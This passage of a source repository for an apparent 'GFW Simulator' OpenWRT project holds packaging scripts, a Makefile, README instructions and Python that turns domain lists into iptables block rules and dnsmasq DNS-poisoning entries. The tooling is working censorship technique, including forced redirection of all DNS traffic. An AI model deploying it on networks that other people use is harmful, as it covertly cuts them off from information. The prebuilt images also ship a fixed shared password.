SOCKS connections by IP Range.'] 77 | cont += [('iptables -A IPBLOCK -m string --algo bm --hex-string "|' 78 | + kw + '|" ' + action) for kw in generate_socks_keys(keywords)] 79 | return '\n'.join(cont) 80 | 81 | 82 | def get_socks_keys(filename='resource/subnets.txt'): 83 | return generate_socks_keys(generate_from_subnets(get_subnets())) 84 | 85 | 86 | if __name__ == '__main__': 87 | main() 88 | -------------------------------------------------------------------------------- /ipk/make_ipk.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | VERSION="0.01 alpha" 3 | # 4 | # Title: make_ipk.sh 5 | # Author: Jeremy Collake 6 | # 7 | # Creates a IPK from the given directory 8 | # 9 | # 10 | echo "$0 (c)2006 Jeremy Collake make_ipkg.log 19 | OLD_DIR=`pwd` 20 | if [ -f "$2" ]; then 21 | echo " Erasing existing $2 ..." 22 | rm $2 23 | #>> make_ipkg.log 2>&1 24 | fi 25 | ############################################## 26 | # change to package ipk folder 27 | # 28 | cd "$2" 29 | ############################################## 30 | # do some cleanup from any previous runs 31 | # 32 | rm "packagetemp.tar" 33 | ############################################## 34 | # create control.tar 35 | # 36 | echo " Creating control.tar ..." 37 | tar -cf "control.tar" "./control" "./conffiles" "./postinst" "./preremove" 38 | if [ $? != 0 ] || [ ! -f "control.tar" ]; then 39 | echo " ERROR: creation of $2/control.tar failed!" 40 | exit 2 41 | fi 42 | ############################################## 43 | # create control.tar.gz 44 | # 45 | echo " Creating control.tar.gz ..." 46 | gzip < "control.tar" > "control.tar.gz" 47 | if [ $? != 0 ] || [ ! -f "control.tar.gz" ]; then 48 | echo " ERROR: creation of $2/control.tar.gz failed!" 49 | exit 2 50 | fi 51 | ############################################## 52 | # create data.tar 53 | # 54 | # exclude control, conffiles, this script (if it exists), 55 | # and anything else prudent to ignore 56 | # 57 | echo " Creating data.tar ..." 58 | OUR_BASENAME=`basename $0` 59 | IPK_BASENAME=`basename $1` 60 | # just get top-level directories actually 61 | ALL_FILES=`find "./" -maxdepth 1 | sed 1d` 62 | rm data.tar 63 | INPUT_FILES=" " 64 | for i in $ALL_FILES; do 65 | echo " Processing $i " 66 | if [ -d $i ]; then 67 | INPUT_FILES=`echo $INPUT_FILES "$i"` 68 | fi 69 | done 70 | echo " dbg.infiles: $INPUT_FILES" 71 | tar "--exclude=./control.tar" "--exclude=./control" "--exclude=./conffile*" "--exclude=./$OUR_BASENAME" "--exclude=./$IPK_BASENAME" "--exclude=./make_ipk*.log" -cvf data.tar $INPUT_FILES 72 | echo " -------- current data.tar ----------" 73 | tar -tvf data.tar 74 | if [ $? != 0 ] || [ ! -f "data.tar" ]; then 75 | echo " ERROR: creation of $2/data.tar failed!" 76 | exit 2 77 | fi 78 | ############################################## 79 | # create data.tar.gz 80 | # 81 | # exclude control, conffiles, and this script if it's there.. 82 | # 83 | echo " Creating data.tar.gz ..." 84 | OUR_BASENAME=`basename $0` 85 | gzip < "data.tar" > "data.tar.gz" 86 | if [ $? != 0 ] || [ ! -f "data.tar.gz" ]; then 87 | echo " ERROR: creation of $2/data.tar.gz failed!" 88 | exit 2 89 | fi 90 | 91 | 92 | ############################################## 93 | # create PACKAGE.tar 94 | # 95 | tar -cf "packagetemp.tar" "./control.tar.gz" "./data.tar.gz" "./debian_binary" 96 | if [ $? != 0 ] || [ ! -f "packagetemp.tar" ]; then 97 | echo " ERROR: creation of packagetemp.tar failed!" 98 | exit 2 99 | fi 100 | ############################################## 101 | # finally gzip the result to PACKAGE.ipk 102 | # 103 | gzip < "packagetemp.tar" > "$1" 104 | if [ $? != 0 ] || [ ! -f $1 ]; then 105 | echo " ERROR: creation of $1 failed!" 106 | exit 2 107 | fi 108 | echo " Done. Created: $1" 109 | cd $OLD_DIR 110 | -------------------------------------------------------------------------------- /ipk-snort/make_ipk.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | VERSION="0.01 alpha" 3 | # 4 | # Title: make_ipk.sh 5 | # Author: Jeremy Collake 6 | # 7 | # Creates a IPK from the given directory 8 | # 9 | # 10 | echo "$0 (c)2006 Jeremy Collake make_ipkg.log 19 | OLD_DIR=`pwd` 20 | if [ -f "$2" ]; then 21 | echo " Erasing existing $2 ..." 22 | rm $2 23 | #>> make_ipkg.log 2>&1 24 | fi 25 | ############################################## 26 | # change to package ipk folder 27 | # 28 | cd "$2" 29 | ############################################## 30 | # do some cleanup from any previous runs 31 | # 32 | rm "packagetemp.tar" 33 | ############################################## 34 | # create control.tar 35 | # 36 | echo " Creating control.tar ..." 37 | tar -cf "control.tar" "./control" "./conffiles" "./postinst" "./preremove" 38 | if [ $? != 0 ] || [ ! -f "control.tar" ]; then 39 | echo " ERROR: creation of $2/control.tar failed!" 40 | exit 2 41 | fi 42 | ############################################## 43 | # create control.tar.gz 44 | # 45 | echo " Creating control.tar.gz ..." 46 | gzip < "control.tar" > "control.tar.gz" 47 | if [ $? != 0 ] || [ ! -f "control.tar.gz" ]; then 48 | echo " ERROR: creation of $2/control.tar.gz failed!" 49 | exit 2 50 | fi 51 | ############################################## 52 | # create data.tar 53 | # 54 | # exclude control, conffiles, this script (if it exists), 55 | # and anything else prudent to ignore 56 | # 57 | echo " Creating data.tar ..." 58 | OUR_BASENAME=`basename $0` 59 | IPK_BASENAME=`basename $1` 60 | # just get top-level directories actually 61 | ALL_FILES=`find "./" -maxdepth 1 | sed 1d` 62 | rm data.tar 63 | INPUT_FILES=" " 64 | for i in $ALL_FILES; do 65 | echo " Processing $i " 66 | if [ -d $i ]; then 67 | INPUT_FILES=`echo $INPUT_FILES "$i"` 68 | fi 69 | done 70 | echo " dbg.infiles: $INPUT_FILES" 71 | tar "--exclude=./control.tar" "--exclude=./control" "--exclude=./conffile*" "--exclude=./$OUR_BASENAME" "--exclude=./$IPK_BASENAME" "--exclude=./make_ipk*.log" -cvf data.tar $INPUT_FILES 72 | echo " -------- current data.tar ----------" 73 | tar -tvf data.tar 74 | if [ $? != 0 ] || [ ! -f "data.tar" ]; then 75 | echo " ERROR: creation of $2/data.tar failed!" 76 | exit 2 77 | fi 78 | ############################################## 79 | # create data.tar.gz 80 | # 81 | # exclude control, conffiles, and this script if it's there.. 82 | # 83 | echo " Creating data.tar.gz ..." 84 | OUR_BASENAME=`basename $0` 85 | gzip < "data.tar" > "data.tar.gz" 86 | if [ $? != 0 ] || [ ! -f "data.tar.gz" ]; then 87 | echo " ERROR: creation of $2/data.tar.gz failed!" 88 | exit 2 89 | fi 90 | 91 | 92 | ############################################## 93 | # create PACKAGE.tar 94 | # 95 | tar -cf "packagetemp.tar" "./control.tar.gz" "./data.tar.gz" "./debian_binary" 96 | if [ $? != 0 ] || [ ! -f "packagetemp.tar" ]; then 97 | echo " ERROR: creation of packagetemp.tar failed!" 98 | exit 2 99 | fi 100 | ############################################## 101 | # finally gzip the result to PACKAGE.ipk 102 | # 103 | gzip < "packagetemp.tar" > "$1" 104 | if [ $? != 0 ] || [ ! -f $1 ]; then 105 | echo " ERROR: creation of $1 failed!" 106 | exit 2 107 | fi 108 | echo " Done. Created: $1" 109 | cd $OLD_DIR 110 | -------------------------------------------------------------------------------- /ipblock/update_rules.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import requests 3 | import random 4 | import re 5 | import ipaddr 6 | from ipwhois import IPWhois 7 | from joblib import Parallel, delayed 8 | 9 | def is_ip(addr): 10 | try: 11 | socket.inet_aton(addr) 12 | return True 13 | except socket.error: 14 | return False 15 | 16 | def resolve_addr(addr): 17 | try: 18 | addr = addr.strip() 19 | if not is_ip(addr): 20 | ip = socket.gethostbyname(addr) 21 | if not ip: 22 | ip = socket.gethostbyname('www.' + addr) 23 | else: 24 | ip = addr 25 | ip = ip[:ip.rfind('.')] + '.0/24' 26 | return ip 27 | except: 28 | return None 29 | 30 | def generate_from_domain(filename='resource/domains.txt', thread_num=20): 31 | f = open(filename, 'r') 32 | _parallel = Parallel(n_jobs=thread_num, backend="threading") 33 | resolved_addr = _parallel(delayed(resolve_addr)(addr) for addr in f.readlines()) 34 | return [addr for addr in resolved_addr if addr] 35 | 36 | def generate_from_subnets(filename='resource/ips.txt'): 37 | return open(filename, 'r').readlines() 38 | 39 | def generate_google_ips_from_online(url='https://raw.githubusercontent.com/justjavac/Google-IPs/master/README.md'): 40 | return generate_ip_list_from_url(url) 41 | 42 | def generate_from_smarthost(url='https://smarthosts.googlecode.com/svn/trunk/hosts'): 43 | return generate_ip_list_from_url(url) 44 | 45 | def generate_ip_list_from_url(url): 46 | r = requests.get(url) 47 | if r.status_code != 200: 48 | # Fail 49 | return [] 50 | content = r.text 51 | matches = re.findall('[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+', content) 52 | matches = list({ip[:ip.rfind('.')] + '.0/24' for ip in matches}) 53 | return matches 54 | 55 | def generate_iptables_from_subnets(subnets, actions=None): 56 | if not actions: 57 | actions = ['-p tcp -j REJECT --reject-with tcp-reset', '-j DROP'] 58 | subnets = list({subnet.strip() for subnet in subnets if subnet}) 59 | cont = ['#!/bin/sh', 'iptables -N IPBLOCK'] 60 | for subnet in subnets: 61 | rule = ('iptables -A IPBLOCK -d ' + subnet + ' ' 62 | + random.choice(actions)) 63 | cont.append(rule) 64 | cont.extend([#'iptables -I INPUT -j IPBLOCK', 65 | #'iptables -I OUTPUT -j IPBLOCK', 66 | 'iptables -I FORWARD -j IPBLOCK']) 67 | return '\n'.join(cont) 68 | 69 | whois_pool = [] 70 | def run_whois(addr): 71 | is_in = lambda addr, pool: reduce(lambda x,y: x or y, 72 | [net.Contains(addr) for net in pool], 73 | False) 74 | sample = addr[:addr.rfind('.')] + '.1/32' 75 | ip = ipaddr.IPv4Network(sample) 76 | if not is_in(ip, whois_pool): 77 | try: 78 | data = IPWhois(addr[:addr.rfind('.')] + '.1').lookup(get_referral=True) 79 | cidr = data['nets'][0]['cidr'] 80 | whois_pool.append(ipaddr.IPv4Network(cidr)) 81 | return cidr 82 | except: 83 | return addr 84 | return None 85 | 86 | def resolve_whois_subnet(subnet): 87 | _parallel = Parallel(n_jobs=20, backend="threading") 88 | result = _parallel(delayed(run_whois)(addr) for addr in subnet) 89 | return [x for x in result if x] 90 | 91 | 92 | def generate_iptables(): 93 | resolved_subnets = resolve_whois_subnet( 94 | generate_google_ips_from_online() + 95 | generate_from_subnets() + generate_from_domain('resource/heavy_domains.txt')); 96 | subnets = ( resolved_subnets + generate_from_smarthost() + 97 | generate_from_domain() ) 98 | return generate_iptables_from_subnets(subnets) 99 | 100 | 101 | if __name__ == '__main__': 102 | print generate_iptables() 103 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | dir=$(shell pwd) 2 | 3 | environment: 4 | # pip install joblib 5 | # pip install requests 6 | -mkdir $(dir)/dist 7 | -mkdir $(dir)/tmp 8 | 9 | dns_poison: environment 10 | cd dns_poisoning ; python update_blacklist.py -f blacklist.txt 11 | cd dns_poisoning ; sh generate.sh >$(dir)/tmp/blacklist.txt 12 | 13 | ip_block: environment 14 | cd ipblock ; python update_rules.py >$(dir)/tmp/ipblock.sh 15 | 16 | keywords: environment 17 | cd keywords ; export PYTHONIOENCODING="UTF-8"; python generate_rules.py >$(dir)/tmp/keywords.sh 18 | 19 | collect: dns_poison ip_block preventbypass keywords updater 20 | cp -r $(dir)/misc/* $(dir)/dist 21 | 22 | -mkdir -p $(dir)/dist/etc/dnsmasq.d/ 23 | cp $(dir)/tmp/blacklist.txt $(dir)/dist/etc/dnsmasq.d/domains.conf 24 | 25 | -mkdir -p $(dir)/dist/usr/bin/ 26 | cp $(dir)/tmp/ipblock.sh $(dir)/dist/usr/bin/ipblock.sh 27 | cp $(dir)/tmp/keywords.sh $(dir)/dist/usr/bin/keywords.sh 28 | 29 | cp $(dir)/preventbypass/enable-block.sh $(dir)/dist/usr/bin/preventbypass.sh 30 | chmod +x $(dir)/dist/usr/bin/* 31 | chmod +x $(dir)/dist/etc/init.d/* 32 | 33 | preventbypass: environment 34 | 35 | clean: 36 | -rm -r $(dir)/dist $(dir)/tmp 37 | 38 | update: collect 39 | tar zcvf update.tgz -C dist `ls dist` 40 | -mkdir releases 41 | mv update.tgz releases/ 42 | md5sum releases/update.tgz | awk '{print $1;}' > ./tmp/md5sum 43 | cat releases/digest | tail --lines=+2 >> ./tmp/md5sum 44 | mv ./tmp/md5sum releases/digest 45 | 46 | updater: environment 47 | cp updater/updater.sh $(dir)/dist/usr/bin/gfw.updater.sh 48 | 49 | ipk: 50 | cp -r ipk tmp/ 51 | cp -r dist/* tmp/ipk/ 52 | tmp/ipk/make_ipk.sh $(dir)/releases/gfw.ipk ./tmp/ipk 53 | 54 | ipk-snort: 55 | cp -r ipk-snort tmp/ 56 | cp -r misc-snort/* tmp/ipk-snort 57 | cp keywords/local.gfw.rules ./tmp/ipk-snort/etc/snort/rules/ 58 | tmp/ipk-snort/make_ipk.sh $(dir)/releases/gfw-snort.ipk ./tmp/ipk-snort 59 | 60 | deb: 61 | -mkdir dist_pc 62 | chmod 755 dist_pc 63 | # Make a copy 64 | tar cf dist_pc.tar dist_pc 65 | -rm -rf dist_pc/usr dist_pc/etc 66 | cp -r dist/* dist_pc 67 | # Add copyright file 68 | cp LICENSE dist_pc/DEBIAN/copyright 69 | # Fix init.d script: overwrite 70 | mv dist_pc/DEBIAN/etc.init.d.gfw dist_pc/etc/init.d/gfw 71 | # Put changelog/copyright file 72 | gzip --best dist_pc/DEBIAN/changelog dist_pc/DEBIAN/changelog.Debian 73 | -mkdir -p dist_pc/usr/share/doc/gfwsim/ 74 | mv dist_pc/DEBIAN/copyright dist_pc/usr/share/doc/gfwsim/ 75 | mv dist_pc/DEBIAN/*.gz dist_pc/usr/share/doc/gfwsim/ 76 | # Fix up rules 77 | sed -i -e "s|/etc/init.d/firewall restart|iptables -F|g" dist_pc/etc/init.d/gfw 78 | sed -i -e "s|FORWARD|OUTPUT|g" dist_pc/usr/bin/*.sh 79 | sed -i -e "s|PREROUTING|OUTPUT|g" dist_pc/usr/bin/dns.sh 80 | sed -i -e "s|127.0.0.1|180.76.76.76|g" dist_pc/usr/bin/dns.sh 81 | # Generate MD5sum & Configure file list 82 | find dist_pc/etc -type f | sed -e 's|dist_pc/|/|g' >dist_pc/DEBIAN/conffiles 83 | md5sum `find dist_pc/etc dist_pc/usr -type f ` | sed -e 's|dist_pc/||g' >dist_pc/DEBIAN/md5sums 84 | # Fix permission 85 | chown -R root:root dist_pc/* 86 | # Actual build DEB 87 | dpkg-deb --build dist_pc 88 | chmod 777 dist_pc.deb 89 | mv dist_pc.deb ./releases/ 90 | # Fix permissions for building RPM 91 | chmod 555 ./dist_pc/usr/bin ./dist_pc/ 92 | chmod 755 ./dist_pc/etc/init.d 93 | -mkdir -p ./dist_pc/etc/rc.d/ 94 | mv ./dist_pc/etc/init.d ./dist_pc/etc/rc.d/init.d 95 | sed -i -e 's|etc/init.d/|etc/rc.d/init.d/|g' dist_pc/DEBIAN/* 96 | dpkg-deb --build dist_pc 97 | chmod 666 dist_pc.deb 98 | alien -r --scripts dist_pc.deb 99 | rm dist_pc.deb 100 | mv gfwsim*.rpm ./releases/ 101 | rpmbuild -bb rpm_spec 102 | mv /tmp/noarch/gfwsim-meta-1.0.0-0.noarch.rpm releases/ 103 | chmod 666 releases/gfwsim*.rpm 104 | # Clean up 105 | -rm -rf dist_pc 106 | # Decompress from backup tarball 107 | tar xf dist_pc.tar 108 | 109 | 110 | 111 | all: collect 112 | make -B ipk 113 | 114 | -------------------------------------------------------------------------------- /ipblock/resource/heavy_domains.txt: -------------------------------------------------------------------------------- 1 | google.com 2 | google.ac 3 | google.ad 4 | google.ae 5 | google.com.af 6 | google.com.ag 7 | google.com.ai 8 | google.al 9 | google.am 10 | google.co.ao 11 | google.com.ar 12 | google.as 13 | google.at 14 | google.com.au 15 | google.az 16 | google.ba 17 | google.com.bd 18 | google.be 19 | google.bf 20 | google.bg 21 | google.com.bh 22 | google.bi 23 | google.bj 24 | google.com.bn 25 | google.com.bo 26 | google.com.br 27 | google.bs 28 | google.bt 29 | google.co.bw 30 | google.by 31 | google.com.bz 32 | google.ca 33 | google.com.kh 34 | google.cc 35 | google.cd 36 | google.cf 37 | google.cat 38 | google.cg 39 | google.ch 40 | google.ci 41 | google.co.ck 42 | google.cl 43 | google.cm 44 | google.cn 45 | google.com.co 46 | google.co.cr 47 | google.hr 48 | google.com.cu 49 | google.cv 50 | google.com.cy 51 | google.cz 52 | google.de 53 | google.dj 54 | google.dk 55 | google.dm 56 | google.com.do 57 | google.dz 58 | google.com.ec 59 | google.ee 60 | google.com.eg 61 | google.es 62 | google.com.et 63 | google.fi 64 | google.com.fj 65 | google.fm 66 | google.fr 67 | google.ga 68 | google.ge 69 | google.gf 70 | google.de 71 | google.gg 72 | google.com.gh 73 | google.com.gi 74 | google.gl 75 | google.gm 76 | google.gp 77 | google.gr 78 | google.com.gt 79 | google.gy 80 | google.com.hk 81 | google.hn 82 | google.hr 83 | google.ht 84 | google.hu 85 | google.co.id 86 | google.ir 87 | google.iq 88 | google.ie 89 | google.co.il 90 | google.im 91 | google.co.in 92 | google.io 93 | google.is 94 | google.it 95 | google.je 96 | google.com.jm 97 | google.jo 98 | google.co.jp 99 | google.co.ke 100 | google.ki 101 | google.kg 102 | google.co.kr 103 | google.com.kw 104 | google.kz 105 | google.la 106 | google.com.lb 107 | google.com.lc 108 | google.li 109 | google.lk 110 | google.co.ls 111 | google.lt 112 | google.lu 113 | google.lv 114 | google.com.ly 115 | google.co.ma 116 | google.md 117 | google.me 118 | google.mg 119 | google.mk 120 | google.ml 121 | google.com.mm 122 | google.mn 123 | google.ms 124 | google.com.mt 125 | google.mu 126 | google.mv 127 | google.mw 128 | google.com.mx 129 | google.com.my 130 | google.co.mz 131 | google.com.na 132 | google.ne 133 | google.com.nf 134 | google.com.ng 135 | google.com.ni 136 | google.nl 137 | google.no 138 | google.com.np 139 | google.nr 140 | google.nu 141 | google.co.nz 142 | google.com.om 143 | google.com.pa 144 | google.com.pe 145 | google.com.ph 146 | google.com.pk 147 | google.pl 148 | google.com.pg 149 | google.pn 150 | google.com.pr 151 | google.ps 152 | google.pt 153 | google.com.py 154 | google.com.qa 155 | google.ro 156 | google.rs 157 | google.ru 158 | google.rw 159 | google.com.sa 160 | google.com.sb 161 | google.sc 162 | google.se 163 | google.com.sg 164 | google.sh 165 | google.si 166 | google.sk 167 | google.com.sl 168 | google.sn 169 | google.sm 170 | google.so 171 | google.st 172 | google.com.sv 173 | google.td 174 | google.tg 175 | google.co.th 176 | google.com.tj 177 | google.tk 178 | google.tl 179 | google.tm 180 | google.to 181 | google.tn 182 | google.com.tn 183 | google.com.tr 184 | google.tt 185 | google.com.tw 186 | google.co.tz 187 | google.com.ua 188 | google.co.ug 189 | google.co.uk 190 | google.us 191 | google.com.uy 192 | google.co.uz 193 | google.com.vc 194 | google.co.ve 195 | google.vg 196 | google.co.vi 197 | google.com.vn 198 | google.vu 199 | google.ws 200 | google.co.za 201 | google.co.zm 202 | google.co.zw 203 | google.com 204 | google.org 205 | google.net 206 | google.com 207 | googleapis.com 208 | gstatic.com 209 | youtube.com 210 | admob.com 211 | adsense.com 212 | adwords.com 213 | android.com 214 | blogger.com 215 | blogspot.com 216 | chromium.org 217 | chrome.com 218 | chromebook.com 219 | feedburner.com 220 | doubleclick.com 221 | igoogle.com 222 | foofle.com 223 | froogle.com 224 | googleanalytics.com 225 | google-analytics.com 226 | googlecode.com 227 | Source 228 | googledrive.com 229 | googlearth.com 230 | googleearth.com 231 | googlemaps.com 232 | googlepagecreator.com 233 | googlescholar.com 234 | gmail.com 235 | googlemail.com 236 | keyhole.com 237 | Code 238 | panoramio.com 239 | picasa.com 240 | sketchup.com 241 | urchin.com 242 | waze.com 243 | youtube.com 244 | youtu.be 245 | yt.be 246 | ytimg.com 247 | youtubeeducation.com 248 | youtube-nocookie.com 249 | like.com 250 | google.org 251 | google.net 252 | 1e100.net[6] 253 | 466453.com[7] 254 | gooogle.com 255 | gogle.com 256 | ggoogle.com 257 | gogole.com 258 | goolge.com 259 | googel.com 260 | googlee.com 261 | googil.com 262 | googlr.com 263 | ggpht.com 264 | gmodules.com 265 | gtempaccount.com 266 | gstatic.com 267 | googleadservices.com 268 | googleapps.com 269 | googleapis.com 270 | goo.gl 271 | googlebot.com 272 | googlecommerce.com 273 | googlesyndication.com 274 | whatbrowser.org 275 | localhost.com 276 | withgoogle.com 277 | twitter.com 278 | twimg.com 279 | fbstatic-a.akamaihd.net 280 | akamaihd.net 281 | fbcdn-profile-a.akamaihd.net 282 | www.cloudflare.com 283 | www.edgecast.com 284 | cdn.sstatic.net 285 | -------------------------------------------------------------------------------- /dns_poisoning/update_blacklist.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | # Originally in clowwindy/gfwlist2pac, under MIT License 4 | # Adapted by phoeagon 5 | 6 | import pkgutil 7 | import urlparse 8 | import json 9 | import logging 10 | import urllib2 11 | from argparse import ArgumentParser 12 | 13 | __all__ = ['main'] 14 | 15 | 16 | gfwlist_url = 'https://autoproxy-gfwlist.googlecode.com/svn/trunk/gfwlist.txt' 17 | 18 | 19 | def parse_args(): 20 | parser = ArgumentParser() 21 | parser.add_argument('-i', '--input', dest='input', 22 | help='path to gfwlist', metavar='GFWLIST') 23 | parser.add_argument('-f', '--file', dest='output', required=True, 24 | help='path to output pac', metavar='PAC') 25 | parser.add_argument('--user-rule', dest='user_rule', 26 | help='user rule file, which will be appended to' 27 | ' gfwlist') 28 | parser.add_argument('--precise', dest='precise', action='store_true', 29 | help='use adblock plus algorithm instead of O(1)' 30 | ' lookup') 31 | return parser.parse_args() 32 | 33 | 34 | def decode_gfwlist(content): 35 | # decode base64 if have to 36 | try: 37 | if '.' in content: 38 | raise Exception() 39 | return content.decode('base64') 40 | except: 41 | return content 42 | 43 | 44 | def get_hostname(something): 45 | try: 46 | # quite enough for GFW 47 | if not something.startswith('http:'): 48 | something = 'http://' + something 49 | r = urlparse.urlparse(something) 50 | return r.hostname 51 | except Exception as e: 52 | logging.error(e) 53 | return None 54 | 55 | 56 | def add_domain_to_set(s, something): 57 | hostname = get_hostname(something) 58 | if hostname is not None: 59 | s.add(hostname) 60 | 61 | 62 | def combine_lists(content, user_rule=None): 63 | builtin_rules = open('resources/builtin.txt', 'r').readlines() 64 | gfwlist = content.splitlines(False) 65 | gfwlist.extend(builtin_rules) 66 | if user_rule: 67 | gfwlist.extend(user_rule.splitlines(False)) 68 | return gfwlist 69 | 70 | 71 | def parse_gfwlist(gfwlist): 72 | domains = set() 73 | for line in gfwlist: 74 | if line.find('.*') >= 0: 75 | continue 76 | elif line.find('*') >= 0: 77 | line = line.replace('*', '/') 78 | if line.startswith('||'): 79 | line = line.lstrip('||') 80 | elif line.startswith('|'): 81 | line = line.lstrip('|') 82 | elif line.startswith('.'): 83 | line = line.lstrip('.') 84 | if line.startswith('!'): 85 | continue 86 | elif line.startswith('['): 87 | continue 88 | elif line.startswith('@'): 89 | # ignore white list 90 | continue 91 | add_domain_to_set(domains, line) 92 | return domains 93 | 94 | 95 | def reduce_domains(domains): 96 | # reduce 'www.google.com' to 'google.com' 97 | # remove invalid domains 98 | tlds = set([x.strip() for x in open('resources/tld.txt', 'r').readlines()]) 99 | new_domains = set() 100 | for domain in domains: 101 | domain_parts = domain.split('.') 102 | last_root_domain = None 103 | for i in xrange(0, len(domain_parts)): 104 | root_domain = '.'.join(domain_parts[len(domain_parts) - i - 1:]) 105 | if i == 0: 106 | if not tlds.__contains__(root_domain): 107 | # root_domain is not a valid tld 108 | break 109 | last_root_domain = root_domain 110 | if tlds.__contains__(root_domain): 111 | continue 112 | else: 113 | break 114 | if last_root_domain is not None: 115 | new_domains.add(last_root_domain) 116 | return new_domains 117 | 118 | 119 | def generate_pac_fast(domains): 120 | proxy_content = "\n".join([x.replace("\n", '') 121 | for x in list(domains)]) 122 | return proxy_content 123 | 124 | 125 | def main(): 126 | args = parse_args() 127 | user_rule = None 128 | if (args.input): 129 | with open(args.input, 'rb') as f: 130 | content = f.read() 131 | else: 132 | print 'Downloading gfwlist from %s' % gfwlist_url 133 | content = urllib2.urlopen(gfwlist_url, timeout=10).read() 134 | if args.user_rule: 135 | userrule_parts = urlparse.urlsplit(args.user_rule) 136 | if not userrule_parts.scheme or not userrule_parts.netloc: 137 | # It's not an URL, deal it as local file 138 | with open(args.user_rule, 'rb') as f: 139 | user_rule = f.read() 140 | else: 141 | # Yeah, it's an URL, try to download it 142 | print 'Downloading user rules file from %s' % args.user_rule 143 | user_rule = urllib2.urlopen(args.user_rule, timeout=10).read() 144 | 145 | content = decode_gfwlist(content) 146 | gfwlist = combine_lists(content, user_rule) 147 | domains = parse_gfwlist(gfwlist) 148 | domains = reduce_domains(domains) 149 | pac_content = generate_pac_fast(domains) 150 | with open(args.output, 'wb') as f: 151 | f.write(pac_content) 152 | 153 | 154 | if __name__ == '__main__': 155 | main() 156 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | GFW Simulator 2 | ======================= 3 | phoeagon 4 | 5 | A [GFW](http://en.wikipedia.org/wiki/Golden_Shield_Project) 6 | simulator to work on routers, based on [OpenWRT](http://openwrt.org). 7 | This is a mock implementation of GFW on OpenWRT routers. 8 | 9 | A non-technical description [here](http://gfwrouter.info). 10 | 11 | ## Getting Started 12 | 13 | Assume you have a router that is already with OpenWRT installed. (14.07 14 | Barrier Breaker recommended). 15 | 16 | Grab the `ipk` files from 17 | [`./releases`](https://github.com/phoeagon/gfw-sim/tree/release/releases) 18 | under *release* branch. (`gfw.ipk` and optionally `gfw-snort.ipk`.) 19 | 20 | cd /tmp 21 | wget "https://github.com/phoeagon/gfw-sim/raw/release/releases/gfw.ipk" 22 | wget "https://github.com/phoeagon/gfw-sim/raw/release/releases/gfw-snort.ipk" 23 | scp gfw*.ipk root@[router_ip]:/tmp 24 | ssh root@[router_ip] 25 | > # On your router 26 | > opkg update 27 | > opkg install /tmp/gfw.ipk 28 | # This installs the main component 29 | # If you would like to install the keyword censoring system with 30 | # Snorb, go on with: 31 | > opkg install /tmp/gfw-snorb.ipk 32 | # No matter whether you install `gfw-snorb.ipk`, do a 33 | > reboot 34 | # to finish up. 35 | 36 | 37 | ## Goal 38 | 39 | The router simulates the end-user experience as if within GFW. It aims at 40 | providing a *seemless, immersive* Internet experience with Chinese 41 | characteristics. 42 | 43 | The router does not replicate the internal mechanism of GFW, and may use 44 | different techniques to provide similar user experience. For instance, 45 | in the early days GFW did not drop packets but instead send RST packets to 46 | force hang up a connection. It might also send bogus DNS responses but doesn't 47 | intercept the original one. This implementation does not aim at reproducing 48 | such mechanisms. 49 | 50 | ## Installation 51 | 52 | Currently the project is not for production use, yet. 53 | 54 | ### Prebuilt images 55 | 56 | Currently only prebuilt images for D-Link DIR-505 is available. The file 57 | may be found in our release tab. It's based on the trunk version of 58 | OpenWRT (as of 2014/12/30). 59 | 60 | To install the prebuilt image, use any router with OpenWRT already installed. 61 | (The following procedure erases your configurations on the router, so always 62 | backup first!) 63 | 64 | (pc)> scp prebuilt.bin root@[router_ip]:/tmp/ 65 | (pc)> ssh root@[router_ip] 66 | $ sysupgrade -n -v /tmp/prebuilt.bin 67 | # -n for not preserving your current configurations. You may 68 | # go without it if you know what you are doing. 69 | 70 | The prebuilt images has password `gfw-protected` for its Wifi and SSH login. 71 | And works as a wireless router, sharing Internet access from `eth1`, from which 72 | it gets a dynamic IP from DHCP, to provide WiFi Internet access to `wlan0`, under 73 | the AP name `GFWed`. 74 | 75 | ### Installing with OpenWRT's `opkg` 76 | 77 | Grab the `gfw*.ipk` files from `releases` folder. 78 | 79 | cd /tmp 80 | wget "https://github.com/phoeagon/gfw-sim/raw/release/releases/gfw.ipk" 81 | wget "https://github.com/phoeagon/gfw-sim/raw/release/releases/gfw-snort.ipk" 82 | scp gfw*.ipk root@[router_ip]:/tmp 83 | ssh root@[router_ip] 84 | > # On your router 85 | > opkg update 86 | > opkg install /tmp/gfw*.ipk 87 | > reboot 88 | 89 | ### Installing with source files 90 | 91 | It's only tested on an Ubuntu trusty. 92 | 93 | 1. Install python (version 2), and relevant libraries (`joblib`, `requests`). 94 | 95 | # Assuming python2 is already installed (as by default). 96 | sudo apt-get install pip 97 | sudo pip install joblib 98 | sudo pip install requests 99 | 100 | 2. Do a `make` at the root of the source file. You need an uncensored network 101 | connection for this. 102 | 103 | 3. Get the compiled rule files under `/dist`. 104 | 105 | 4. Transfer the files to OpenWRT: 106 | 107 | scp -r dist/* root@[ip_of_router]:/ 108 | 109 | 5. At the router, you should install `iptables-mod-filter`. 110 | 111 | opkg update 112 | opkg install iptables-mod-filter 113 | 114 | 115 | ### Installing with prebuilt rule files 116 | 117 | (pc) > ssh root@[router_ip] 118 | $ opkg update 119 | $ opkg install wget tar iptables-mod-filter dnsmasq 120 | $ wget -O /tmp/gfw.tgz "https://github.com/phoeagon/gfw-sim/raw/release/releases/update.tgz" 121 | $ cd / 122 | $ tar xf /tmp/gfw.tgz 123 | $ /etc/init.d/gfw enable 124 | $ /etc/init.d/gfw start 125 | 126 | ## Design and Implementation 127 | 128 | The implementation consists of four modules: 129 | 130 | + DNS Poisoning 131 | + IP Blocking 132 | + Keywords Censoring 133 | + Prevention of Bypassing 134 | 135 | ### DNS Poisoning 136 | 137 | The router sets up a DNS server with `dnsmasq` listening for requests from port 138 | 53. This DNS daemon has a internal list of domains that are hardwired to return 139 | a static IP address, preventing the correct IP address being returned. 140 | 141 | For those not on the list, the daemon makes requests to *Baidu Public DNS Server* and returns the response as is. 142 | 143 | With `iptables`, all UDP traffic to any IP address through port 53 is redirected to this server. 144 | 145 | ### IP Blocking 146 | 147 | The router 